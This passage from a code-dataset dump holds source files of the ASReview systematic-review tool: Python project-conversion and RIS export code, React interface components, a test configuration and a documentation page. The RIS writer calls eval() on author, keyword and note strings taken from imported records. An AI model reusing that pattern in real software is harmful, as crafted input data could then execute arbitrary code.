.sql file at results_fp.\n\n Arguments\n ---------\n sql_fp: str/path\n Path where to save the record table. Should be a .sql file.\n json_fp: str/path\n Path to the json state file.\n \"\"\"\n\n with open_state_legacy(json_fp) as json_state:\n record_table = get_json_record_table(json_state)\n\n # Convert record_table to list of tuples.\n record_table = [(record_id,) for record_id in range(len(record_table))]\n\n con = sqlite3.connect(sql_fp)\n cur = con.cursor()\n cur.execute(\n \"\"\"CREATE TABLE record_table\n (record_id INT)\"\"\"\n )\n cur.executemany(\n \"\"\"INSERT INTO record_table VALUES\n (?)\"\"\",\n record_table,\n )\n con.commit()\n con.close()\n\n\ndef convert_json_results_to_sql(sql_fp, json_fp, labeled_json_fp):\n \"\"\"Convert the result of a json state file to a sqlite database.\"\"\"\n with open_state_legacy(json_fp, read_only=True) as sf:\n with sqlite3.connect(sql_fp) as con:\n with open(labeled_json_fp, \"r\") as file:\n labeled_json = json.load(file)\n\n cur = con.cursor()\n\n # Create the results table.\n cur.execute(\n \"\"\"CREATE TABLE results\n (record_id INTEGER,\n label INTEGER,\n classifier TEXT,\n query_strategy TEXT,\n balance_strategy TEXT,\n feature_extraction TEXT,\n training_set INTEGER,\n labeling_time INTEGER,\n notes TEXT)\"\"\"\n )\n\n record_table = get_json_record_table(sf)\n record_id_to_row_number = {\n record_table[i]: i for i in range(len(record_table))\n }\n old_record_ids = [x[0] for x in labeled_json]\n sf_indices = [\n record_id_to_row_number[record_id] for record_id in old_record_ids\n ]\n\n sf_labels = [x[1] for x in labeled_json]\n\n # query strategy.\n old_query_strategy = [\n sample_data[2]\n for query in range(len(sf._state_dict[\"results\"]))\n for sample_data in sf._state_dict[\"results\"][query][\"labelled\"]\n ]\n\n n_priors = old_query_strategy.count(\"prior\")\n n_records_labeled = len(sf_indices)\n n_non_prior_records = n_records_labeled - n_priors\n\n query_strategy = sf.settings.to_dict()[\"query_strategy\"]\n sf_query_strategy = [\"prior\"] * n_priors + [\n query_strategy\n ] * n_non_prior_records\n\n # classifier.\n classifier = sf.settings.to_dict()[\"model\"]\n sf_classifiers = [None] * n_priors + [\n f\"{classifier}\" for _ in range(n_non_prior_records)\n ]\n\n # training set.\n sf_training_sets = [-1] * n_priors + list(\n range(n_priors, n_records_labeled)\n )\n\n # feature extraction.\n feature_extraction = sf.settings.to_dict()[\"feature_extraction\"]\n sf_feature_extraction = [None] * n_priors + [\n f\"{feature_extraction}\" for _ in range(n_non_prior_records)\n ]\n\n # balance strategy.\n balance_strategy = sf.settings.to_dict()[\"balance_strategy\"]\n sf_balance_strategy = [None] * n_priors + [\n f\"{balance_strategy}\" for _ in range(n_non_prior_records)\n ]\n\n # Labeling time.\n sf_time = [0 for _ in range(n_records_labeled)]\n\n # No notes were saved before.\n sf_notes = [None for _ in range(n_records_labeled)]\n\n # Check that all datasets have the same number of entries.\n lengths = [\n len(sf_indices),\n len(sf_labels),\n len(sf_classifiers),\n len(sf_training_sets),\n len(sf_query_strategy),\n len(sf_time),\n len(sf_feature_extraction),\n len(sf_balance_strategy),\n len(sf_notes),\n ]\n if not all([length == n_records_labeled for length in lengths]):\n raise StateError(\"All datasets should have the same number of entries.\")\n\n # Create the database rows.\n db_rows = [\n (\n sf_indices[i],\n sf_labels[i],\n sf_classifiers[i],\n sf_query_strategy[i],\n sf_balance_strategy[i],\n sf_feature_extraction[i],\n sf_training_sets[i],\n sf_time[i],\n sf_notes[i],\n )\n for i in range(n_records_labeled)\n ]\n cur.executemany(\n \"\"\"INSERT INTO results VALUES\n (?, ?, ?, ?, ?, ?, ?, ?, ?)\"\"\",\n db_rows,\n )\n con.commit()\n\n\ndef create_decision_changes_table(sql_fp):\n \"\"\"Create an emtpy table that will contain the record_ids and new labels\n of the records whose label was changed after the original labeling action.\n Also contains the time at which the label was changed.\"\"\"\n with sqlite3.connect(sql_fp) as con:\n cur = con.cursor()\n\n cur.execute(\n \"\"\"CREATE TABLE decision_changes\n (record_id INTEGER,\n new_label INTEGER,\n time INTEGER)\"\"\"\n )\n\n con.commit()\n\n\n# Disable is_converted_check.\ndef rollback_conversion(fp, from_version=1, to_version=0, check_is_converted=True):\n if from_version != 1 and to_version != 0:\n raise ValueError(\n f\"Not possible to roll back conversion from v{from_version} \"\n f\"to v{to_version}.\"\n )\n\n if check_is_converted and not is_converted_project(fp):\n raise ValueError(f\"Project file at {fp} is not a converted \" f\"project file.\")\n\n fp = Path(fp)\n legacy_fp = Path(fp, \"legacy\")\n\n # Delete everything other than the legacy folder.\n for item in fp.iterdir():\n if item.is_file():\n item.unlink()\n elif item.is_dir() and (item.name != \"legacy\"):\n shutil.rmtree(item)\n else:\n pass\n\n # Copy from legacy folder and delete it after.\n shutil.copytree(legacy_fp, fp, dirs_exist_ok=True)\n shutil.rmtree(legacy_fp)\n\n\ndef is_converted_project(fp):\n \"\"\"Check if asreview file has been converter from v0 to v1.\"\"\"\n # Check if there is a legacy project.json and it has v0.\n try:\n with open(Path(fp, \"legacy\", \"project.json\"), \"r\") as f:\n project_config_old = json.load(f)\n except FileNotFoundError:\n return False\n\n if project_config_old[\"version\"][0] != \"0\":\n return False\n\n # Check if the current project.json has 'state_version' == 1.\n with open(Path(fp, \"project.json\"), \"r\") as f:\n project_config_current = json.load(f)\n\n try:\n current_state_version = project_config_current[\"state_version\"]\n except KeyError:\n return False\n\n if current_state_version[0] == \"1\":\n return True\n else:\n return False\n" }, { "alpha_fraction": 0.5350118279457092, "alphanum_fraction": 0.5428796410560608, "avg_line_length": 29.261905670166016, "blob_id": "aba62ec2ad8e9bc0400fdc0bdd0b28ab1d820d75", "content_id": "387b39b3ebfbb191b5203d6f7dd8279fce777247", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "JavaScript", "length_bytes": 1271, "license_type": "permissive", "max_line_length": 178, "num_lines": 42, "path": "/asreview/webapp/src/ProjectComponents/SetupComponents/DataComponents/EnoughPriorBanner.js", "repo_name": "terrymyc/asreview", "src_encoding": "UTF-8", "text": "import React from \"react\";\nimport { Banner } from \"material-ui-banner\";\nimport InfoOutlinedIcon from \"@mui/icons-material/InfoOutlined\";\n\nconst EnoughPriorBanner = (props) => {\n return (\n <div>\n <Banner\n open={props.reminder}\n onClose={props.toggleReminder}\n label={`${props.n_prior_exclusions} records were labeled as irrelevant. You have found enough irrelevant records as prior knowledge. Try to search for relevant records?`}\n icon={<InfoOutlinedIcon sx={{ color: \"text.secondary\" }} />}\n iconProps={{\n sx: { bgcolor: \"transparent\" },\n }}\n buttonLabel=\"Search\"\n buttonOnClick={props.onClickPriorSearch}\n buttonProps={{\n sx: { color: \"text.secondary\" },\n }}\n dismissButtonLabel=\"Show more\"\n dismissButtonProps={{\n sx: { color: \"text.secondary\" },\n }}\n paperProps={{\n sx: {\n bgcolor: (theme) =>\n theme.palette.mode === \"dark\" ? \"grey.900\" : \"grey.50\",\n },\n }}\n cardProps={{\n sx: {\n bgcolor: (theme) =>\n theme.palette.mode === \"dark\" ? \"grey.900\" : \"grey.50\",\n },\n }}\n />\n </div>\n );\n};\n\nexport default EnoughPriorBanner;\n" }, { "alpha_fraction": 0.609343945980072, "alphanum_fraction": 0.6312127113342285, "avg_line_length": 27.742856979370117, "blob_id": "5fdfb8c7866a92d0aa0be3ed01cf976adf8df05e", "content_id": "28a7c379b8692b55a1ad591cbd500045b42ecec5", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "JavaScript", "length_bytes": 1006, "license_type": "permissive", "max_line_length": 66, "num_lines": 35, "path": "/asreview/webapp/src/Components/CardErrorHandler.js", "repo_name": "terrymyc/asreview", "src_encoding": "UTF-8", "text": "import React from \"react\";\nimport { useQueryClient } from \"react-query\";\nimport { Backdrop, Button, Typography } from \"@mui/material\";\nimport { styled } from \"@mui/material/styles\";\n\nconst StyledBackdrop = styled(Backdrop)(({ theme }) => ({\n borderRadius: 16,\n flexDirection: \"column\",\n position: \"absolute\",\n zIndex: 1,\n ...(theme.palette.mode === \"light\" && {\n backgroundColor: \"rgba(255, 255, 255, 0.8)\",\n }),\n ...(theme.palette.mode === \"dark\" && {\n backgroundColor: \"rgba(18, 18, 18, 0.8)\",\n }),\n}));\n\nexport default function CardErrorHandler(props) {\n const queryClient = useQueryClient();\n const resetQuery = () => {\n queryClient.resetQueries(props.queryKey);\n };\n\n return (\n <StyledBackdrop open={props.isError}>\n <Typography align=\"center\" sx={{ color: \"text.secondary\" }}>\n {props.error ? props.error.message : null}\n </Typography>\n <Button variant=\"outlined\" onClick={resetQuery}>\n Try to Refresh\n </Button>\n </StyledBackdrop>\n );\n}\n" }, { "alpha_fraction": 0.4466131031513214, "alphanum_fraction": 0.4684270918369293, "avg_line_length": 19.738094329833984, "blob_id": "ed3a5b7948f5394df56f73b66f45547a3ed20d28", "content_id": "adb3a7385a9ac26cf18d58dc71e42aaf712c9dbd", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "JavaScript", "length_bytes": 871, "license_type": "permissive", "max_line_length": 71, "num_lines": 42, "path": "/asreview/webapp/src/ProjectComponents/SetupComponents/SavingStateBox.js", "repo_name": "terrymyc/asreview", "src_encoding": "UTF-8", "text": "import * as React from \"react\";\nimport { Box, Typography } from \"@mui/material\";\n\nexport default function SavingStateBox(props) {\n const [state, setState] = React.useState(false);\n\n React.useEffect(() => {\n if (props.isSaving) {\n setState(true);\n } else {\n setTimeout(() => {\n setState(false);\n }, 1000);\n }\n }, [props.isSaving]);\n\n React.useEffect(() => {\n return () => {\n setState(false);\n };\n }, []);\n\n return (\n <Box\n sx={{\n bgcolor: (theme) => {\n if (theme.palette.mode === \"dark\") {\n return \"#282828\";\n } else {\n return \"rgba(0, 0, 0, 0.06)\";\n }\n },\n pl: 1,\n pr: 1,\n }}\n >\n <Typography variant=\"subtitle2\" sx={{ color: \"text.secondary\" }}>\n {!state ? \"Saved\" : \"Saving...\"}\n </Typography>\n </Box>\n );\n}\n" }, { "alpha_fraction": 0.6369102597236633, "alphanum_fraction": 0.6373727917671204, "avg_line_length": 26.367088317871094, "blob_id": "1685b4663d4a74a262a6e2fb896272140c8a5996", "content_id": "458b96b8ab72065806b41a884f0a53374ac25b41", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "JavaScript", "length_bytes": 2162, "license_type": "permissive", "max_line_length": 76, "num_lines": 79, "path": "/asreview/webapp/src/redux/reducers/index.js", "repo_name": "terrymyc/asreview", "src_encoding": "UTF-8", "text": "import {\n AUTHENTICATION,\n MY_PROJECTS,\n OAUTH_SERVICES,\n SET_ASREVIEW_VERSION,\n SET_BOOT_DATA,\n SET_PROJECT,\n TOGGLE_HELP_DIALOG,\n} from \"../../constants/action-types\";\n\nconst initialState = {\n asreview_version: undefined,\n authentication: undefined,\n email_verification: undefined,\n email_config: undefined,\n allow_account_creation: undefined,\n allow_teams: undefined,\n oAuthData: {\n services: {},\n compareKey: \"oAuthCompareKey\", // these 2 values are used when the oAuth\n messageType: \"oAuthMessage\", // popup has to communicate with the opener\n },\n status: undefined,\n project_id: null,\n onHelpDialog: false,\n myProjects: [],\n};\n\nfunction rootReducer(state = initialState, action) {\n switch (action.type) {\n case SET_ASREVIEW_VERSION:\n return Object.assign({}, state, {\n asreview_version: action.asreview_version,\n });\n case AUTHENTICATION:\n return Object.assign({}, state, {\n authentication: action.authentication,\n });\n case SET_PROJECT:\n return Object.assign({}, state, {\n project_id: action.project_id,\n });\n case TOGGLE_HELP_DIALOG:\n return Object.assign({}, state, {\n onHelpDialog: !state.onHelpDialog,\n });\n // set boot data\n case SET_BOOT_DATA:\n return Object.assign({}, state, {\n asreview_version: action.data.version,\n authentication: action.data.authentication,\n status: action.data.status,\n email_verification: Boolean(action.data.email_verification),\n email_config: Boolean(action.data.email_config),\n allow_account_creation: Boolean(action.data.allow_account_creation),\n allow_teams: Boolean(action.data.allow_teams),\n });\n // set my projects list\n case MY_PROJECTS:\n return Object.assign({}, state, {\n myProjects: action.data,\n });\n // set OAuth services\n case OAUTH_SERVICES: {\n const newState = {\n ...state.oAuthData,\n services: action.data,\n };\n return Object.assign({}, state, {\n oAuthData: newState,\n });\n }\n // default\n default:\n return state;\n }\n}\n\nexport default rootReducer;\n" }, { "alpha_fraction": 0.5699905753135681, "alphanum_fraction": 0.5762818455696106, "avg_line_length": 31.773195266723633, "blob_id": "00c158941ddb2ea6cccde7384bbdd2ecb6e92cfa", "content_id": "d69e998fd77d6c945b7437ce52b4d633ce11f586", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3179, "license_type": "permissive", "max_line_length": 83, "num_lines": 97, "path": "/asreview/io/ris_writer.py", "repo_name": "terrymyc/asreview", "src_encoding": "UTF-8", "text": "# Copyright 2019-2022 The ASReview Authors. All Rights Reserved.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\nimport pandas as pd\nimport rispy\n\n\nclass RISWriter:\n \"\"\"RIS file writer.\"\"\"\n\n name = \"ris\"\n label = \"RIS\"\n caution = \"Available only if you imported a RIS file when creating the project\"\n write_format = \".ris\"\n\n @classmethod\n def write_data(cls, df, fp, labels=None, ranking=None):\n \"\"\"Export dataset.\n\n Arguments\n ---------\n df: pandas.Dataframe\n Dataframe of all available record data.\n fp: str, pathlib.Path\n File path to the RIS file, if exists.\n labels: list, numpy.ndarray\n Current labels will be overwritten by these labels\n (including unlabelled). No effect if labels is None.\n ranking: list\n Reorder the dataframe according to these (internal) indices.\n Default ordering if ranking is None.\n\n Returns\n -------\n RIS file\n Dataframe of all available record data.\n \"\"\"\n\n # Turn pandas DataFrame into records (list of dictionaries) for rispy\n records = df.to_dict(\"records\")\n\n # Create an array for storing modified records\n records_new = []\n\n # Iterate over all available records\n for rec in records:\n\n def _notnull(v):\n if isinstance(v, list):\n return False\n return pd.notnull(v)\n\n # Remove all nan values\n rec_copy = {k: v for k, v in rec.items() if _notnull(v)}\n\n for m in [\"authors\", \"keywords\", \"notes\"]: # AU, KW, N1\n # Check the \"authors\" - AU\n try:\n rec_copy[m] = eval(rec_copy[m])\n except Exception:\n rec_copy[m] = []\n\n # Get label for record if specified, if not specified set to -1\n included = rec_copy.pop(\"included\", -1)\n\n # Map labels to notes\n dict_note = {\n -1: \"ASReview_not_seen\",\n 0: \"ASReview_irrelevant\",\n 1: \"ASReview_relevant\",\n }\n rec_copy[\"notes\"].insert(0, dict_note[included])\n\n # Append the deepcopied and updated record to a new array\n records_new.append(rec_copy)\n\n # From buffered dataframe\n if fp is None:\n # Write the whole content to buffer\n return rispy.dumps(records_new)\n\n # From IO dataframe\n else:\n # Write the whole content to a file\n with open(fp, \"w\", encoding=\"utf8\") as fp:\n rispy.dump(records_new, fp)\n" }, { "alpha_fraction": 0.762499988079071, "alphanum_fraction": 0.762499988079071, "avg_line_length": 25.83333396911621, "blob_id": "8b733f13cafd2ec50a6debef83444334b8f9bddb", "content_id": "3de4ccd1af9e6607a4014d98fcfd9777a3e8e268", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "TOML", "length_bytes": 160, "license_type": "permissive", "max_line_length": 37, "num_lines": 6, "path": "/asreview/webapp/tests/config/auth_no_creation.toml", "repo_name": "terrymyc/asreview", "src_encoding": "UTF-8", "text": "TESTING = true\nDEBUG = true\nSECRET_KEY = \"my_very_secret_key\"\nSECURITY_PASSWORD_SALT = \"my_salt\"\nAUTHENTICATION_ENABLED = true\nALLOW_ACCOUNT_CREATION = false" }, { "alpha_fraction": 0.621076226234436, "alphanum_fraction": 0.6219730973243713, "avg_line_length": 27.58974266052246, "blob_id": "eb95f2431b0690f787f7a5bf93939f32f3fad3a2", "content_id": "c1e72816dd8395fbf0018e8a6b53f8b3e77258f6", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "JavaScript", "length_bytes": 2230, "license_type": "permissive", "max_line_length": 70, "num_lines": 78, "path": "/asreview/webapp/src/HomeComponents/DashboardComponents/ProjectsOverview.js", "repo_name": "terrymyc/asreview", "src_encoding": "UTF-8", "text": "import * as React from \"react\";\nimport { Box, Fab, Stack } from \"@mui/material\";\nimport { Add } from \"@mui/icons-material\";\nimport {\n DashboardPageHeader,\n NumberCard,\n ProjectTable,\n} from \"../DashboardComponents\";\nimport { useToggle } from \"../../hooks/useToggle\";\nimport { ActionsFeedbackBar } from \"../../Components\";\nimport { ProjectImportDialog } from \"../../ProjectComponents\";\nimport { SetupDialog } from \"../../ProjectComponents/SetupComponents\";\n\nconst ProjectsOverview = (props) => {\n const [onImportDialog, toggleImportDialog] = useToggle();\n const [feedbackBar, setFeedbackBar] = React.useState({\n open: false,\n message: null,\n });\n\n const resetFeedbackBar = () => {\n setFeedbackBar({\n ...feedbackBar,\n open: false,\n });\n };\n\n return (\n <>\n <DashboardPageHeader\n mobileScreen={props.mobileScreen}\n toggleImportDialog={toggleImportDialog}\n />\n <Box className=\"main-page-body-wrapper\">\n <Stack className=\"main-page-body\" spacing={6}>\n <NumberCard mobileScreen={props.mobileScreen} />\n <ProjectTable\n onNavDrawer={props.onNavDrawer}\n projectCheck={props.projectCheck}\n setFeedbackBar={setFeedbackBar}\n setProjectCheck={props.setProjectCheck}\n toggleProjectSetup={props.toggleProjectSetup}\n toggleAcceptanceSetup={props.AcceptanceDialog}\n />\n </Stack>\n </Box>\n <Fab\n className=\"main-page-fab\"\n color=\"primary\"\n onClick={props.toggleProjectSetup}\n variant=\"extended\"\n >\n <Add sx={{ mr: 1 }} />\n Create\n </Fab>\n <ProjectImportDialog\n mobileScreen={props.mobileScreen}\n open={onImportDialog}\n onClose={toggleImportDialog}\n setFeedbackBar={setFeedbackBar}\n />\n <SetupDialog\n mobileScreen={props.mobileScreen}\n open={props.onProjectSetup}\n onClose={props.toggleProjectSetup}\n setFeedbackBar={setFeedbackBar}\n />\n <ActionsFeedbackBar\n center\n onClose={resetFeedbackBar}\n open={feedbackBar.open}\n feedback={feedbackBar.message}\n />\n </>\n );\n};\n\nexport default ProjectsOverview;\n" }, { "alpha_fraction": 0.5065146684646606, "alphanum_fraction": 0.509772002696991, "avg_line_length": 32.0107536315918, "blob_id": "10db87e79e144873f3386bb856bd4af47dff5a1a", "content_id": "d0871d340957e343dace9d77d465cc774d2fd99e", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "JavaScript", "length_bytes": 9210, "license_type": "permissive", "max_line_length": 102, "num_lines": 279, "path": "/asreview/webapp/src/ProjectComponents/SetupComponents/DataComponents/AddDataset.js", "repo_name": "terrymyc/asreview", "src_encoding": "UTF-8", "text": "import * as React from \"react\";\nimport { useMutation, useQueryClient } from \"react-query\";\nimport { connect } from \"react-redux\";\nimport {\n Box,\n Button,\n DialogContent,\n DialogTitle,\n Divider,\n Fade,\n FormControl,\n FormControlLabel,\n FormLabel,\n Link,\n Radio,\n RadioGroup,\n Stack,\n Typography,\n} from \"@mui/material\";\nimport { styled } from \"@mui/material/styles\";\n\nimport { AppBarWithinDialog } from \"../../../Components\";\nimport { DatasetFromEntryPoint, DatasetFromURL } from \"../DataComponents\";\nimport { InfoCard } from \"../../SetupComponents\";\nimport { ImportFromFile } from \"../../../ProjectComponents\";\nimport { ProjectAPI } from \"../../../api/index.js\";\nimport { mapStateToProps, projectModes } from \"../../../globals.js\";\n\nconst PREFIX = \"AddDataset\";\n\nconst classes = {\n root: `${PREFIX}-root`,\n form: `${PREFIX}-form`,\n};\n\nconst Root = styled(\"div\")(({ theme }) => ({\n overflowY: \"hidden\",\n [`& .${classes.form}`]: {\n height: \"calc(100% - 64px)\",\n overflowY: \"scroll\",\n padding: \"24px 48px 48px 48px\",\n [theme.breakpoints.down(\"md\")]: {\n height: \"calc(100% - 56px)\",\n padding: \"32px 24px 48px 24px\",\n },\n },\n}));\n\nconst AddDataset = (props) => {\n const queryClient = useQueryClient();\n\n const [datasetSource, setDatasetSource] = React.useState(\"file\");\n const [file, setFile] = React.useState(null);\n const [url, setURL] = React.useState(\"\");\n const [extension, setExtension] = React.useState(null);\n const [benchmark, setBenchmark] = React.useState(null);\n\n const { error, isError, isLoading, mutate, reset } = useMutation(\n ProjectAPI.mutateData,\n {\n onSettled: () => {\n props.setDisableFetchInfo(false);\n queryClient.invalidateQueries(\"fetchInfo\");\n },\n onSuccess: () => {\n queryClient.invalidateQueries(\"fetchLabeledStats\");\n props.toggleAddDataset();\n },\n },\n );\n\n const handleDatasetSource = (event) => {\n setDatasetSource(event.target.value);\n // clear potential error\n reset();\n };\n\n const handleSaveDataset = React.useCallback(() => {\n mutate({\n project_id: props.project_id,\n file: file,\n url: url,\n extension: extension,\n benchmark: benchmark,\n });\n }, [benchmark, extension, file, mutate, props.project_id, url]);\n\n const handleClose = () => {\n props.toggleAddDataset();\n // clear potential error\n reset();\n };\n\n React.useEffect(() => {\n if (props.mode === projectModes.EXPLORATION) {\n setDatasetSource(\"benchmark\");\n }\n if (props.mode !== projectModes.EXPLORATION) {\n setDatasetSource(\"file\");\n }\n }, [props.mode]);\n\n // auto import once dataset is selected\n React.useEffect(() => {\n if (file || extension || benchmark) {\n handleSaveDataset();\n }\n }, [handleSaveDataset, file, benchmark, extension]);\n\n return (\n <Root>\n {props.mobileScreen && (\n <AppBarWithinDialog\n disableStartIcon={isLoading}\n onClickStartIcon={handleClose}\n startIconIsClose={false}\n title=\"Dataset\"\n />\n )}\n {!props.mobileScreen && (\n <Fade in>\n <Stack className=\"dialog-header\" direction=\"row\">\n <DialogTitle>Dataset</DialogTitle>\n <Box className=\"dialog-header-button right\">\n <Button disabled={isLoading} onClick={handleClose}>\n Close\n </Button>\n </Box>\n </Stack>\n </Fade>\n )}\n <Divider />\n <Fade in>\n <DialogContent className={classes.form}>\n <Stack spacing={3}>\n {props.datasetAdded && (\n <InfoCard info=\"Editing dataset removes the added prior knowledge\" />\n )}\n <FormControl disabled={isLoading} component=\"fieldset\">\n <FormLabel component=\"legend\">Add a dataset from</FormLabel>\n <RadioGroup\n row\n aria-label=\"dataset source\"\n name=\"row-radio-buttons-group\"\n value={datasetSource}\n >\n <FormControlLabel\n value=\"file\"\n control={<Radio />}\n label=\"File\"\n onChange={handleDatasetSource}\n />\n <FormControlLabel\n value=\"url\"\n control={<Radio />}\n label=\"URL or DOI\"\n onChange={handleDatasetSource}\n />\n {props.mode === projectModes.ORACLE && (\n <FormControlLabel\n value=\"extension\"\n control={<Radio />}\n label=\"Extension\"\n onChange={handleDatasetSource}\n />\n )}\n {(props.mode === projectModes.EXPLORATION ||\n props.mode === projectModes.SIMULATION) && (\n <FormControlLabel\n value=\"benchmark\"\n control={<Radio />}\n label=\"Benchmark datasets\"\n onChange={handleDatasetSource}\n />\n )}\n </RadioGroup>\n </FormControl>\n {(datasetSource === \"file\" || datasetSource === \"url\") && (\n <Typography variant=\"body2\" sx={{ color: \"text.secondary\" }}>\n Supported formats are RIS (<code>.ris</code>, <code>.txt</code>)\n and tabular datasets (<code>.csv</code>, <code>.tab</code>,{\" \"}\n <code>.tsv</code>, <code>.xlsx</code>). The dataset should\n contain a title and abstract for each record.{\" \"}\n {props.mode !== projectModes.ORACLE\n ? \"The dataset should contain labels for each record. \"\n : \"\"}\n To optimally benefit from the performance of the active learning\n model, it is highly recommended to add a dataset without\n duplicate records and complete records.{\" \"}\n <Link\n underline=\"none\"\n href=\"https://asreview.readthedocs.io/en/latest/intro/datasets.html\"\n target=\"_blank\"\n >\n Learn more\n </Link>\n </Typography>\n )}\n {datasetSource === \"extension\" && (\n <Typography variant=\"body2\" sx={{ color: \"text.secondary\" }}>\n Select a dataset from an extension.{\" \"}\n <Link\n underline=\"none\"\n href=\"https://asreview.readthedocs.io/en/latest/extensions/overview_extensions.html\"\n target=\"_blank\"\n >\n Learn more\n </Link>\n </Typography>\n )}\n {datasetSource === \"benchmark\" && (\n <Typography variant=\"body2\" sx={{ color: \"text.secondary\" }}>\n The benchmark datasets were manually labeled and can be used to\n explore or demonstrate ASReview LAB. You can donate your dataset\n to the benchmark platform.{\" \"}\n <Link\n underline=\"none\"\n href=\"https://github.com/asreview/systematic-review-datasets\"\n target=\"_blank\"\n >\n Learn more\n </Link>\n </Typography>\n )}\n {datasetSource === \"file\" && (\n <ImportFromFile\n acceptFormat=\".txt,.tsv,.tab,.csv,.ris,.xlsx\"\n addFileError={error}\n file={file}\n setFile={setFile}\n isAddFileError={isError}\n isAddingFile={isLoading}\n reset={reset}\n />\n )}\n {datasetSource === \"url\" && (\n <DatasetFromURL\n project_id={props.project_id}\n addDatasetError={error}\n handleSaveDataset={handleSaveDataset}\n url={url}\n setURL={setURL}\n isAddDatasetError={isError}\n isAddingDataset={isLoading}\n reset={reset}\n />\n )}\n {datasetSource === \"extension\" && (\n <DatasetFromEntryPoint\n subset=\"plugin\"\n addDatasetError={error}\n extension={extension}\n setExtension={setExtension}\n isAddDatasetError={isError}\n isAddingDataset={isLoading}\n mobileScreen={props.mobileScreen}\n reset={reset}\n />\n )}\n {datasetSource === \"benchmark\" && (\n <DatasetFromEntryPoint\n subset=\"benchmark\"\n addDatasetError={error}\n benchmark={benchmark}\n setBenchmark={setBenchmark}\n isAddDatasetError={isError}\n isAddingDataset={isLoading}\n mobileScreen={props.mobileScreen}\n reset={reset}\n />\n )}\n </Stack>\n </DialogContent>\n </Fade>\n </Root>\n );\n};\n\nexport default connect(mapStateToProps)(AddDataset);\n" }, { "alpha_fraction": 0.5372274518013, "alphanum_fraction": 0.5438091158866882, "avg_line_length": 24.86170196533203, "blob_id": "5e102ac679592be9ca78cde4957f4f97ccd9476a", "content_id": "118318def06962e8d7877f2b2679e754b1302444", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "JavaScript", "length_bytes": 2431, "license_type": "permissive", "max_line_length": 87, "num_lines": 94, "path": "/asreview/webapp/src/ProjectComponents/DetailsComponents/DataFormCard.js", "repo_name": "terrymyc/asreview", "src_encoding": "UTF-8", "text": "import * as React from \"react\";\nimport { useNavigate, useParams } from \"react-router-dom\";\nimport {\n Box,\n Button,\n Card,\n CardContent,\n Link,\n Stack,\n Typography,\n} from \"@mui/material\";\nimport { styled } from \"@mui/material/styles\";\n\nimport { TypographySubtitle1Medium } from \"../../StyledComponents/StyledTypography.js\";\nimport { historyFilterOptions } from \"../../globals.js\";\n\nconst PREFIX = \"DataFormCard\";\n\nconst classes = {\n cardContent: `${PREFIX}-card-content`,\n singleLine: `${PREFIX}-single-line`,\n};\n\nconst Root = styled(\"div\")(({ theme }) => ({\n [`& .${classes.cardContent}`]: {\n display: \"flex\",\n alignItems: \"center\",\n justifyContent: \"space-between\",\n padding: 24,\n paddingRight: 8,\n position: \"relative\",\n },\n\n [`& .${classes.singleLine}`]: {\n display: \"-webkit-box\",\n WebkitBoxOrient: \"vertical\",\n WebkitLineClamp: 1,\n whiteSpace: \"pre-line\",\n overflow: \"hidden\",\n },\n}));\n\nconst DataFormCard = (props) => {\n const navigate = useNavigate();\n const { project_id } = useParams();\n\n const handleClickViewPrior = () => {\n navigate(`/projects/${project_id}/history`);\n props.setHistoryFilterQuery([\n historyFilterOptions.find((e) => e.value === \"prior\"),\n ]);\n };\n\n return (\n <Root>\n <Card\n elevation={0}\n sx={{\n bgcolor: (theme) =>\n theme.palette.mode === \"dark\" ? \"grey.900\" : \"grey.100\",\n }}\n >\n <CardContent className={classes.cardContent}>\n <Stack spacing={1} sx={{ alignItems: \"flex-start\" }}>\n <Box className={classes.singleLine}>\n <TypographySubtitle1Medium>\n {props.primary}\n </TypographySubtitle1Medium>\n </Box>\n {!props.isError && (\n <Typography\n variant=\"body2\"\n className={classes.singleLine}\n sx={{ color: \"text.secondary\" }}\n >\n {props.secondary}\n </Typography>\n )}\n {props.isError && (\n <Link component=\"button\" underline=\"none\" onClick={props.refetch}>\n Try to refresh\n </Link>\n )}\n </Stack>\n {props.primary === \"Prior knowledge\" && (\n <Button onClick={handleClickViewPrior}>View</Button>\n )}\n </CardContent>\n </Card>\n </Root>\n );\n};\n\nexport default DataFormCard;\n" }, { "alpha_fraction": 0.7657817006111145, "alphanum_fraction": 0.7657817006111145, "avg_line_length": 44.783782958984375, "blob_id": "f7d9c9e786db3fcf1bd303697a01349f7bc7a74e", "content_id": "7163e84f7950416424a28c09cef3a624ae5848b2", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "reStructuredText", "length_bytes": 1695, "license_type": "permissive", "max_line_length": 91, "num_lines": 37, "path": "/docs/source/simulation_webapp.rst", "repo_name": "terrymyc/asreview", "src_encoding": "UTF-8", "text": "Simulate via the webapp\n=======================\n\nTo run a simulation in the ASReview webapp, create a project as described in\n:doc:`project_create`. Most of the steps of the setup are identical or\nstraightforward. In this section, some of the differences are highlighted.\n\nIn the step on *Project Information*, select the \"Simulation\"\nmode (see figure below).\n\n.. figure:: ../images/setup_project_info_simulate.png\n :alt: ASReview LAB simulate option\n\nIn the step *Data*, import a :ref:`fully labeled dataset <data_labeled:fully labeled data>`\nor use one of the benchmark datasets.\n\nSelecting prior knowledge is relatively easy. In case you know relevant\nrecords to start with, use the search function. In case you don't, use the\n*Random* option. Toggle the button \"Relevant\" on top to see some random\nirrelevant records. Label some relevant and some irrelevant records.\n\n.. figure:: ../images/setup_prior_knowledge_random_simulate.png\n :alt: ASReview LAB Prior selection for simulation study\n\nThe 